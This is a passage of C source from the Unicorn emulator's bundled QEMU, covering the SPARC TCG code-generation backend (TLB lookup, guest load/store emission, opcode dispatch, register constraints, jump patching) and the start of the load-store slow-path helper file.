QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -(1 << 12)); /* Perform the TLB load and compare. Inputs: ADDRLO and ADDRHI contain the possible two parts of the address. MEM_INDEX and S_BITS are the memory context and log2 size of the load. WHICH is the offset into the CPUTLBEntry structure of the slot to read. This should be offsetof addr_read or addr_write. The result of the TLB comparison is in %[ix]cc. The sanitized address is in the returned register, maybe %o0. The TLB addend is in %o1. */ static TCGReg tcg_out_tlb_load(TCGContext *s, TCGReg addr, int mem_index, MemOp opc, int which) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif int fast_off = TLB_MASK_TABLE_OFS(mem_index); int mask_off = fast_off + offsetof(CPUTLBDescFast, mask); int table_off = fast_off + offsetof(CPUTLBDescFast, table); const TCGReg r0 = TCG_REG_O0; const TCGReg r1 = TCG_REG_O1; const TCGReg r2 = TCG_REG_O2; unsigned s_bits = opc & MO_SIZE; unsigned a_bits = get_alignment_bits(opc); tcg_target_long compare_mask; /* Load tlb_mask[mmu_idx] and tlb_table[mmu_idx]. */ tcg_out_ld(s, TCG_TYPE_PTR, r0, TCG_AREG0, mask_off); tcg_out_ld(s, TCG_TYPE_PTR, r1, TCG_AREG0, table_off); /* Extract the page index, shifted into place for tlb index. */ tcg_out_arithi(s, r2, addr, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS, SHIFT_SRL); tcg_out_arith(s, r2, r2, r0, ARITH_AND); /* Add the tlb_table pointer, creating the CPUTLBEntry address into R2. 
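In rough pseudo-C, the fast path computed here is (a sketch of the code below, not a separate implementation): entry = table + ((addr >> (TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS)) & mask); hit = ((addr & (TARGET_PAGE_MASK | ((1 << a_bits) - 1))) == entry->addr_read_or_write); host = addr + entry->addend.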
*/ tcg_out_arith(s, r2, r2, r1, ARITH_ADD); /* Load the tlb comparator and the addend. */ tcg_out_ld(s, TCG_TYPE_TL, r0, r2, which); tcg_out_ld(s, TCG_TYPE_PTR, r1, r2, offsetof(CPUTLBEntry, addend)); /* Mask out the page offset, except for the required alignment. We don't support unaligned accesses. */ if (a_bits < s_bits) { a_bits = s_bits; } compare_mask = (tcg_target_ulong)TARGET_PAGE_MASK | ((1 << a_bits) - 1); if (check_fit_tl(compare_mask, 13)) { tcg_out_arithi(s, r2, addr, compare_mask, ARITH_AND); } else { tcg_out_movi(s, TCG_TYPE_TL, r2, compare_mask); tcg_out_arith(s, r2, addr, r2, ARITH_AND); } tcg_out_cmp(s, r0, r2, 0); /* If the guest address must be zero-extended, do so now. */ if (SPARC64 && TARGET_LONG_BITS == 32) { tcg_out_arithi(s, r0, addr, 0, SHIFT_SRL); return r0; } return addr; } #endif /* CONFIG_SOFTMMU */ static const int qemu_ld_opc[16] = { [MO_UB] = LDUB, [MO_SB] = LDSB, [MO_BEUW] = LDUH, [MO_BESW] = LDSH, [MO_BEUL] = LDUW, [MO_BESL] = LDSW, [MO_BEQ] = LDX, [MO_LEUW] = LDUH_LE, [MO_LESW] = LDSH_LE, [MO_LEUL] = LDUW_LE, [MO_LESL] = LDSW_LE, [MO_LEQ] = LDX_LE, }; static const int qemu_st_opc[16] = { [MO_UB] = STB, [MO_BEUW] = STH, [MO_BEUL] = STW, [MO_BEQ] = STX, [MO_LEUW] = STH_LE, [MO_LEUL] = STW_LE, [MO_LEQ] = STX_LE, }; static void tcg_out_qemu_ld(TCGContext *s, TCGReg data, TCGReg addr, TCGMemOpIdx oi, bool is_64) { MemOp memop = get_memop(oi); #ifdef CONFIG_SOFTMMU unsigned memi = get_mmuidx(oi); TCGReg addrz, param; tcg_insn_unit *func; tcg_insn_unit *label_ptr; addrz = tcg_out_tlb_load(s, addr, memi, memop, offsetof(CPUTLBEntry, addr_read)); /* The fast path is exactly one insn. Thus we can perform the entire TLB Hit in the (annulled) delay slot of the branch over the TLB Miss case. */ /* beq,a,pt %[xi]cc, label0 */ label_ptr = s->code_ptr; tcg_out_bpcc0(s, COND_E, BPCC_A | BPCC_PT | (TARGET_LONG_BITS == 64 ? BPCC_XCC : BPCC_ICC), 0); /* delay slot */ tcg_out_ldst_rr(s, data, addrz, TCG_REG_O1, qemu_ld_opc[memop & (MO_BSWAP | MO_SSIZE)]); /* TLB Miss. */ param = TCG_REG_O1; if (!SPARC64 && TARGET_LONG_BITS == 64) { /* Skip the high-part; we'll perform the extract in the trampoline. */ param++; } tcg_out_mov(s, TCG_TYPE_REG, param++, addrz); /* We use the helpers to extend SB and SW data, leaving the case of SL needing explicit extending below. */ if ((memop & MO_SSIZE) == MO_SL) { func = qemu_ld_trampoline[memop & (MO_BSWAP | MO_SIZE)]; } else { func = qemu_ld_trampoline[memop & (MO_BSWAP | MO_SSIZE)]; } tcg_debug_assert(func != NULL); tcg_out_call_nodelay(s, func, false); /* delay slot */ tcg_out_movi(s, TCG_TYPE_I32, param, oi); /* Recall that all of the helpers return 64-bit results. Which complicates things for sparcv8plus. */ if (SPARC64) { /* We let the helper sign-extend SB and SW, but leave SL for here. */ if (is_64 && (memop & MO_SSIZE) == MO_SL) { tcg_out_arithi(s, data, TCG_REG_O0, 0, SHIFT_SRA); } else { tcg_out_mov(s, TCG_TYPE_REG, data, TCG_REG_O0); } } else { if ((memop & MO_SIZE) == MO_64) { tcg_out_arithi(s, TCG_REG_O0, TCG_REG_O0, 32, SHIFT_SLLX); tcg_out_arithi(s, TCG_REG_O1, TCG_REG_O1, 0, SHIFT_SRL); tcg_out_arith(s, data, TCG_REG_O0, TCG_REG_O1, ARITH_OR); } else if (is_64) { /* Re-extend from 32-bit rather than reassembling when we know the high register must be an extension. */ tcg_out_arithi(s, data, TCG_REG_O1, 0, memop & MO_SIGN ? 
SHIFT_SRA : SHIFT_SRL); } else { tcg_out_mov(s, TCG_TYPE_I32, data, TCG_REG_O1); } } *label_ptr |= INSN_OFF19(tcg_ptr_byte_diff(s->code_ptr, label_ptr)); #else if (SPARC64 && TARGET_LONG_BITS == 32) { tcg_out_arithi(s, TCG_REG_T1, addr, 0, SHIFT_SRL); addr = TCG_REG_T1; } tcg_out_ldst_rr(s, data, addr, (guest_base ? TCG_GUEST_BASE_REG : TCG_REG_G0), qemu_ld_opc[memop & (MO_BSWAP | MO_SSIZE)]); #endif /* CONFIG_SOFTMMU */ } static void tcg_out_qemu_st(TCGContext *s, TCGReg data, TCGReg addr, TCGMemOpIdx oi) { MemOp memop = get_memop(oi); #ifdef CONFIG_SOFTMMU unsigned memi = get_mmuidx(oi); TCGReg addrz, param; tcg_insn_unit *func; tcg_insn_unit *label_ptr; addrz = tcg_out_tlb_load(s, addr, memi, memop, offsetof(CPUTLBEntry, addr_write)); /* The fast path is exactly one insn. Thus we can perform the entire TLB Hit in the (annulled) delay slot of the branch over TLB Miss. */ /* beq,a,pt %[xi]cc, label0 */ label_ptr = s->code_ptr; tcg_out_bpcc0(s, COND_E, BPCC_A | BPCC_PT | (TARGET_LONG_BITS == 64 ? BPCC_XCC : BPCC_ICC), 0); /* delay slot */ tcg_out_ldst_rr(s, data, addrz, TCG_REG_O1, qemu_st_opc[memop & (MO_BSWAP | MO_SIZE)]); /* TLB Miss. */ param = TCG_REG_O1; if (!SPARC64 && TARGET_LONG_BITS == 64) { /* Skip the high-part; we'll perform the extract in the trampoline. */ param++; } tcg_out_mov(s, TCG_TYPE_REG, param++, addrz); if (!SPARC64 && (memop & MO_SIZE) == MO_64) { /* Skip the high-part; we'll perform the extract in the trampoline. */ param++; } tcg_out_mov(s, TCG_TYPE_REG, param++, data); func = qemu_st_trampoline[memop & (MO_BSWAP | MO_SIZE)]; tcg_debug_assert(func != NULL); tcg_out_call_nodelay(s, func, false); /* delay slot */ tcg_out_movi(s, TCG_TYPE_I32, param, oi); *label_ptr |= INSN_OFF19(tcg_ptr_byte_diff(s->code_ptr, label_ptr)); #else if (SPARC64 && TARGET_LONG_BITS == 32) { tcg_out_arithi(s, TCG_REG_T1, addr, 0, SHIFT_SRL); addr = TCG_REG_T1; } tcg_out_ldst_rr(s, data, addr, (guest_base ? TCG_GUEST_BASE_REG : TCG_REG_G0), qemu_st_opc[memop & (MO_BSWAP | MO_SIZE)]); #endif /* CONFIG_SOFTMMU */ } static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg args[TCG_MAX_OP_ARGS], const int const_args[TCG_MAX_OP_ARGS]) { TCGArg a0, a1, a2; int c, c2; /* Hoist the loads of the most common arguments. */ a0 = args[0]; a1 = args[1]; a2 = args[2]; c2 = const_args[2]; switch (opc) { case INDEX_op_exit_tb: if (check_fit_ptr(a0, 13)) { tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I7, 8, RETURN); tcg_out_movi_imm13(s, TCG_REG_O0, a0); break; } else if (USE_REG_TB) { intptr_t tb_diff = a0 - (uintptr_t)s->code_gen_ptr; if (check_fit_ptr(tb_diff, 13)) { tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I7, 8, RETURN); /* Note that TCG_REG_TB has been unwound to O1. */ tcg_out_arithi(s, TCG_REG_O0, TCG_REG_O1, tb_diff, ARITH_ADD); break; } } tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_I0, a0 & ~0x3ff); tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I7, 8, RETURN); tcg_out_arithi(s, TCG_REG_O0, TCG_REG_O0, a0 & 0x3ff, ARITH_OR); break; case INDEX_op_goto_tb: if (s->tb_jmp_insn_offset) { /* direct jump method */ if (USE_REG_TB) { /* make sure the patch is 8-byte aligned. 
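This matters because tb_target_set_jmp_target, at the bottom of this file, later repatches the sethi/or pair emitted below with a single atomic 64-bit store (deposit64 plus atomic_set), which is only safe on a naturally aligned doubleword.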
*/ if ((intptr_t)s->code_ptr & 4) { tcg_out_nop(s); } s->tb_jmp_insn_offset[a0] = tcg_current_code_size(s); tcg_out_sethi(s, TCG_REG_T1, 0); tcg_out_arithi(s, TCG_REG_T1, TCG_REG_T1, 0, ARITH_OR); tcg_out_arith(s, TCG_REG_G0, TCG_REG_TB, TCG_REG_T1, JMPL); tcg_out_arith(s, TCG_REG_TB, TCG_REG_TB, TCG_REG_T1, ARITH_ADD); } else { s->tb_jmp_insn_offset[a0] = tcg_current_code_size(s); tcg_out32(s, CALL); tcg_out_nop(s); } } else { /* indirect jump method */ tcg_out_ld_ptr(s, TCG_REG_TB, (uintptr_t)(s->tb_jmp_target_addr + a0)); tcg_out_arithi(s, TCG_REG_G0, TCG_REG_TB, 0, JMPL); tcg_out_nop(s); } set_jmp_reset_offset(s, a0); /* For the unlinked path of goto_tb, we need to reset TCG_REG_TB to the beginning of this TB. */ if (USE_REG_TB) { c = -tcg_current_code_size(s); if (check_fit_i32(c, 13)) { tcg_out_arithi(s, TCG_REG_TB, TCG_REG_TB, c, ARITH_ADD); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T1, c); tcg_out_arith(s, TCG_REG_TB, TCG_REG_TB, TCG_REG_T1, ARITH_ADD); } } break; case INDEX_op_goto_ptr: tcg_out_arithi(s, TCG_REG_G0, a0, 0, JMPL); if (USE_REG_TB) { tcg_out_arith(s, TCG_REG_TB, a0, TCG_REG_G0, ARITH_OR); } else { tcg_out_nop(s); } break; case INDEX_op_br: tcg_out_bpcc(s, COND_A, BPCC_PT, arg_label(a0)); tcg_out_nop(s); break; #define OP_32_64(x) \ glue(glue(case INDEX_op_, x), _i32): \ glue(glue(case INDEX_op_, x), _i64) OP_32_64(ld8u): tcg_out_ldst(s, a0, a1, a2, LDUB); break; OP_32_64(ld8s): tcg_out_ldst(s, a0, a1, a2, LDSB); break; OP_32_64(ld16u): tcg_out_ldst(s, a0, a1, a2, LDUH); break; OP_32_64(ld16s): tcg_out_ldst(s, a0, a1, a2, LDSH); break; case INDEX_op_ld_i32: case INDEX_op_ld32u_i64: tcg_out_ldst(s, a0, a1, a2, LDUW); break; OP_32_64(st8): tcg_out_ldst(s, a0, a1, a2, STB); break; OP_32_64(st16): tcg_out_ldst(s, a0, a1, a2, STH); break; case INDEX_op_st_i32: case INDEX_op_st32_i64: tcg_out_ldst(s, a0, a1, a2, STW); break; OP_32_64(add): c = ARITH_ADD; goto gen_arith; OP_32_64(sub): c = ARITH_SUB; goto gen_arith; OP_32_64(and): c = ARITH_AND; goto gen_arith; OP_32_64(andc): c = ARITH_ANDN; goto gen_arith; OP_32_64(or): c = ARITH_OR; goto gen_arith; OP_32_64(orc): c = ARITH_ORN; goto gen_arith; OP_32_64(xor): c = ARITH_XOR; goto gen_arith; case INDEX_op_shl_i32: c = SHIFT_SLL; do_shift32: /* Limit immediate shift count lest we create an illegal insn. */ tcg_out_arithc(s, a0, a1, a2 & 31, c2, c); break; case INDEX_op_shr_i32: c = SHIFT_SRL; goto do_shift32; case INDEX_op_sar_i32: c = SHIFT_SRA; goto do_shift32; case INDEX_op_mul_i32: c = ARITH_UMUL; goto gen_arith; OP_32_64(neg): c = ARITH_SUB; goto gen_arith1; OP_32_64(not): c = ARITH_ORN; goto gen_arith1; case INDEX_op_div_i32: tcg_out_div32(s, a0, a1, a2, c2, 0); break; case INDEX_op_divu_i32: tcg_out_div32(s, a0, a1, a2, c2, 1); break; case INDEX_op_brcond_i32: tcg_out_brcond_i32(s, a2, a0, a1, const_args[1], arg_label(args[3])); break; case INDEX_op_setcond_i32: tcg_out_setcond_i32(s, args[3], a0, a1, a2, c2); break; case INDEX_op_movcond_i32: tcg_out_movcond_i32(s, args[5], a0, a1, a2, c2, args[3], const_args[3]); break; case INDEX_op_add2_i32: tcg_out_addsub2_i32(s, args[0], args[1], args[2], args[3], args[4], const_args[4], args[5], const_args[5], ARITH_ADDCC, ARITH_ADDC); break; case INDEX_op_sub2_i32: tcg_out_addsub2_i32(s, args[0], args[1], args[2], args[3], args[4], const_args[4], args[5], const_args[5], ARITH_SUBCC, ARITH_SUBC); break; case INDEX_op_mulu2_i32: c = ARITH_UMUL; goto do_mul2; case INDEX_op_muls2_i32: c = ARITH_SMUL; do_mul2: /* The 32-bit multiply insns produce a full 64-bit result. 
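(On 32-bit SPARC the high half of a UMUL/SMUL product is deposited in the %y register and must be fetched with RDY; on v9 the full 64-bit product is written to the destination register.)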
If the destination register can hold it, we can avoid the slower RDY. */ tcg_out_arithc(s, a0, a2, args[3], const_args[3], c); if (SPARC64 || a0 <= TCG_REG_O7) { tcg_out_arithi(s, a1, a0, 32, SHIFT_SRLX); } else { tcg_out_rdy(s, a1); } break; case INDEX_op_qemu_ld_i32: tcg_out_qemu_ld(s, a0, a1, a2, false); break; case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, a0, a1, a2, true); break; case INDEX_op_qemu_st_i32: case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, a0, a1, a2); break; case INDEX_op_ld32s_i64: tcg_out_ldst(s, a0, a1, a2, LDSW); break; case INDEX_op_ld_i64: tcg_out_ldst(s, a0, a1, a2, LDX); break; case INDEX_op_st_i64: tcg_out_ldst(s, a0, a1, a2, STX); break; case INDEX_op_shl_i64: c = SHIFT_SLLX; do_shift64: /* Limit immediate shift count lest we create an illegal insn. */ tcg_out_arithc(s, a0, a1, a2 & 63, c2, c); break; case INDEX_op_shr_i64: c = SHIFT_SRLX; goto do_shift64; case INDEX_op_sar_i64: c = SHIFT_SRAX; goto do_shift64; case INDEX_op_mul_i64: c = ARITH_MULX; goto gen_arith; case INDEX_op_div_i64: c = ARITH_SDIVX; goto gen_arith; case INDEX_op_divu_i64: c = ARITH_UDIVX; goto gen_arith; case INDEX_op_ext_i32_i64: case INDEX_op_ext32s_i64: tcg_out_arithi(s, a0, a1, 0, SHIFT_SRA); break; case INDEX_op_extu_i32_i64: case INDEX_op_ext32u_i64: tcg_out_arithi(s, a0, a1, 0, SHIFT_SRL); break; case INDEX_op_extrl_i64_i32: tcg_out_mov(s, TCG_TYPE_I32, a0, a1); break; case INDEX_op_extrh_i64_i32: tcg_out_arithi(s, a0, a1, 32, SHIFT_SRLX); break; case INDEX_op_brcond_i64: tcg_out_brcond_i64(s, a2, a0, a1, const_args[1], arg_label(args[3])); break; case INDEX_op_setcond_i64: tcg_out_setcond_i64(s, args[3], a0, a1, a2, c2); break; case INDEX_op_movcond_i64: tcg_out_movcond_i64(s, args[5], a0, a1, a2, c2, args[3], const_args[3]); break; case INDEX_op_add2_i64: tcg_out_addsub2_i64(s, args[0], args[1], args[2], args[3], args[4], const_args[4], args[5], const_args[5], false); break; case INDEX_op_sub2_i64: tcg_out_addsub2_i64(s, args[0], args[1], args[2], args[3], args[4], const_args[4], args[5], const_args[5], true); break; case INDEX_op_muluh_i64: tcg_out_arith(s, args[0], args[1], args[2], ARITH_UMULXHI); break; gen_arith: tcg_out_arithc(s, a0, a1, a2, c2, c); break; gen_arith1: tcg_out_arithc(s, a0, TCG_REG_G0, a1, const_args[1], c); break; case INDEX_op_mb: tcg_out_mb(s, a0); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. 
*/ default: tcg_abort(); } } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef R_r = { .args_ct_str = { "R", "r" } }; static const TCGTargetOpDef r_R = { .args_ct_str = { "r", "R" } }; static const TCGTargetOpDef R_R = { .args_ct_str = { "R", "R" } }; static const TCGTargetOpDef r_A = { .args_ct_str = { "r", "A" } }; static const TCGTargetOpDef R_A = { .args_ct_str = { "R", "A" } }; static const TCGTargetOpDef rZ_r = { .args_ct_str = { "rZ", "r" } }; static const TCGTargetOpDef RZ_r = { .args_ct_str = { "RZ", "r" } }; static const TCGTargetOpDef sZ_A = { .args_ct_str = { "sZ", "A" } }; static const TCGTargetOpDef SZ_A = { .args_ct_str = { "SZ", "A" } }; static const TCGTargetOpDef rZ_rJ = { .args_ct_str = { "rZ", "rJ" } }; static const TCGTargetOpDef RZ_RJ = { .args_ct_str = { "RZ", "RJ" } }; static const TCGTargetOpDef R_R_R = { .args_ct_str = { "R", "R", "R" } }; static const TCGTargetOpDef r_rZ_rJ = { .args_ct_str = { "r", "rZ", "rJ" } }; static const TCGTargetOpDef R_RZ_RJ = { .args_ct_str = { "R", "RZ", "RJ" } }; static const TCGTargetOpDef r_r_rZ_rJ = { .args_ct_str = { "r", "r", "rZ", "rJ" } }; static const TCGTargetOpDef movc_32 = { .args_ct_str = { "r", "rZ", "rJ", "rI", "0" } }; static const TCGTargetOpDef movc_64 = { .args_ct_str = { "R", "RZ", "RJ", "RI", "0" } }; static const TCGTargetOpDef add2_32 = { .args_ct_str = { "r", "r", "rZ", "rZ", "rJ", "rJ" } }; static const TCGTargetOpDef add2_64 = { .args_ct_str = { "R", "R", "RZ", "RZ", "RJ", "RI" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_neg_i32: case INDEX_op_not_i32: return &r_r; case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: return &rZ_r; case INDEX_op_add_i32: case INDEX_op_mul_i32: case INDEX_op_div_i32: case INDEX_op_divu_i32: case INDEX_op_sub_i32: case INDEX_op_and_i32: case INDEX_op_andc_i32: case INDEX_op_or_i32: case INDEX_op_orc_i32: case INDEX_op_xor_i32: case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: case INDEX_op_setcond_i32: return &r_rZ_rJ; case INDEX_op_brcond_i32: return &rZ_rJ; case INDEX_op_movcond_i32: return &movc_32; case INDEX_op_add2_i32: case INDEX_op_sub2_i32: return &add2_32; case INDEX_op_mulu2_i32: case INDEX_op_muls2_i32: return &r_r_rZ_rJ; case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i64: case INDEX_op_ld32u_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: return &R_r; case INDEX_op_st8_i64: case INDEX_op_st16_i64: case INDEX_op_st32_i64: case INDEX_op_st_i64: return &RZ_r; case INDEX_op_add_i64: case INDEX_op_mul_i64: case INDEX_op_div_i64: case INDEX_op_divu_i64: case INDEX_op_sub_i64: case INDEX_op_and_i64: case INDEX_op_andc_i64: case INDEX_op_or_i64: case INDEX_op_orc_i64: case INDEX_op_xor_i64: case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: case INDEX_op_setcond_i64: return &R_RZ_RJ; case INDEX_op_neg_i64: case INDEX_op_not_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext32u_i64: return &R_R; case INDEX_op_extrl_i64_i32: case INDEX_op_extrh_i64_i32: return &r_R; case INDEX_op_brcond_i64: return &RZ_RJ; case INDEX_op_movcond_i64: return &movc_64; case INDEX_op_add2_i64: case INDEX_op_sub2_i64: return &add2_64; case 
INDEX_op_muluh_i64: return &R_R_R; case INDEX_op_qemu_ld_i32: return &r_A; case INDEX_op_qemu_ld_i64: return &R_A; case INDEX_op_qemu_st_i32: return &sZ_A; case INDEX_op_qemu_st_i64: return &SZ_A; default: return NULL; } } static void tcg_target_init(TCGContext *s) { /* Only probe for the platform and capabilities if we haven't already determined maximum values at compile time. */ #ifndef use_vis3_instructions { unsigned long hwcap = qemu_getauxval(AT_HWCAP); use_vis3_instructions = (hwcap & HWCAP_SPARC_VIS3) != 0; } #endif s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffffffff; s->tcg_target_available_regs[TCG_TYPE_I64] = ALL_64; s->tcg_target_call_clobber_regs = 0; tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G4); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G5); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G6); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_G7); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O4); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O5); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O6); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_O7); s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_REG_G0); /* zero */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_G6); /* reserved for os */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_G7); /* thread pointer */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_I6); /* frame pointer */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_I7); /* return address */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_O6); /* stack pointer */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_T1); /* for internal use */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_T2); /* for internal use */ } #if SPARC64 # define ELF_HOST_MACHINE EM_SPARCV9 #else # define ELF_HOST_MACHINE EM_SPARC32PLUS # define ELF_HOST_FLAGS EF_SPARC_32PLUS #endif typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[SPARC64 ? 4 : 2]; uint8_t fde_win_save; uint8_t fde_ret_save[3]; } DebugFrame; static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = -sizeof(void *) & 0x7f, .h.cie.return_column = 15, /* o7 */ /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { #if SPARC64 12, 30, /* DW_CFA_def_cfa i6, 2047 */ (2047 & 0x7f) | 0x80, (2047 >> 7) #else 13, 30 /* DW_CFA_def_cfa_register i6 */ #endif }, .fde_win_save = 0x2d, /* DW_CFA_GNU_window_save */ .fde_ret_save = { 9, 15, 31 }, /* DW_CFA_register o7, i7 */ }; void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame)); } void tb_target_set_jmp_target(uintptr_t tc_ptr, uintptr_t jmp_addr, uintptr_t addr) { intptr_t tb_disp = addr - tc_ptr; intptr_t br_disp = addr - jmp_addr; tcg_insn_unit i1, i2; /* We can reach the entire address space for ILP32. 
For LP64, the code_gen_buffer can't be larger than 2GB. */ tcg_debug_assert(tb_disp == (int32_t)tb_disp); tcg_debug_assert(br_disp == (int32_t)br_disp); if (!USE_REG_TB) { atomic_set((uint32_t *)jmp_addr, deposit32(CALL, 0, 30, br_disp >> 2)); flush_icache_range(jmp_addr, jmp_addr + 4); return; } /* This does not exercise the range of the branch, but we do still need to be able to load the new value of TCG_REG_TB. But this does still happen quite often. */ if (check_fit_ptr(tb_disp, 13)) { /* ba,pt %icc, addr */ i1 = (INSN_OP(0) | INSN_OP2(1) | INSN_COND(COND_A) | BPCC_ICC | BPCC_PT | INSN_OFF19(br_disp)); i2 = (ARITH_ADD | INSN_RD(TCG_REG_TB) | INSN_RS1(TCG_REG_TB) | INSN_IMM13(tb_disp)); } else if (tb_disp >= 0) { i1 = SETHI | INSN_RD(TCG_REG_T1) | ((tb_disp & 0xfffffc00) >> 10); i2 = (ARITH_OR | INSN_RD(TCG_REG_T1) | INSN_RS1(TCG_REG_T1) | INSN_IMM13(tb_disp & 0x3ff)); } else { i1 = SETHI | INSN_RD(TCG_REG_T1) | ((~tb_disp & 0xfffffc00) >> 10); i2 = (ARITH_XOR | INSN_RD(TCG_REG_T1) | INSN_RS1(TCG_REG_T1) | INSN_IMM13((tb_disp & 0x3ff) | -0x400)); } atomic_set((uint64_t *)jmp_addr, deposit64(i2, 32, 32, i1)); flush_icache_range(jmp_addr, jmp_addr + 8); }

unicorn-2.1.1/qemu/tcg/tcg-ldst.inc.c

/* * TCG Backend Data: load-store optimization only. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. 
*/ typedef struct TCGLabelQemuLdst { bool is_ld; /* qemu_ld: true, qemu_st: false */ TCGMemOpIdx oi; TCGType type; /* result type of a load */ TCGReg addrlo_reg; /* reg index for low word of guest virtual addr */ TCGReg addrhi_reg; /* reg index for high word of guest virtual addr */ TCGReg datalo_reg; /* reg index for low word to be loaded or stored */ TCGReg datahi_reg; /* reg index for high word to be loaded or stored */ tcg_insn_unit *raddr; /* gen code addr of the next IR of qemu_ld/st IR */ tcg_insn_unit *label_ptr[2]; /* label pointers to be updated */ QSIMPLEQ_ENTRY(TCGLabelQemuLdst) next; } TCGLabelQemuLdst; /* * Generate TB finalization at the end of block */ static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l); static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l); static int tcg_out_ldst_finalize(TCGContext *s) { TCGLabelQemuLdst *lb; /* qemu_ld/st slow paths */ QSIMPLEQ_FOREACH(lb, &s->ldst_labels, next) { if (lb->is_ld ? !tcg_out_qemu_ld_slow_path(s, lb) : !tcg_out_qemu_st_slow_path(s, lb)) { return -2; } /* Test for (pending) buffer overflow. The assumption is that any one operation beginning below the high water mark cannot overrun the buffer completely. Thus we can test for overflow after generating code without having to check during generation. */ if (unlikely((void *)s->code_ptr > s->code_gen_highwater)) { return -1; } } return 0; } /* * Allocate a new TCGLabelQemuLdst entry. */ static inline TCGLabelQemuLdst *new_ldst_label(TCGContext *s) { TCGLabelQemuLdst *l = tcg_malloc(s, sizeof(*l)); QSIMPLEQ_INSERT_TAIL(&s->ldst_labels, l, next); return l; }

unicorn-2.1.1/qemu/tcg/tcg-op-gvec.c

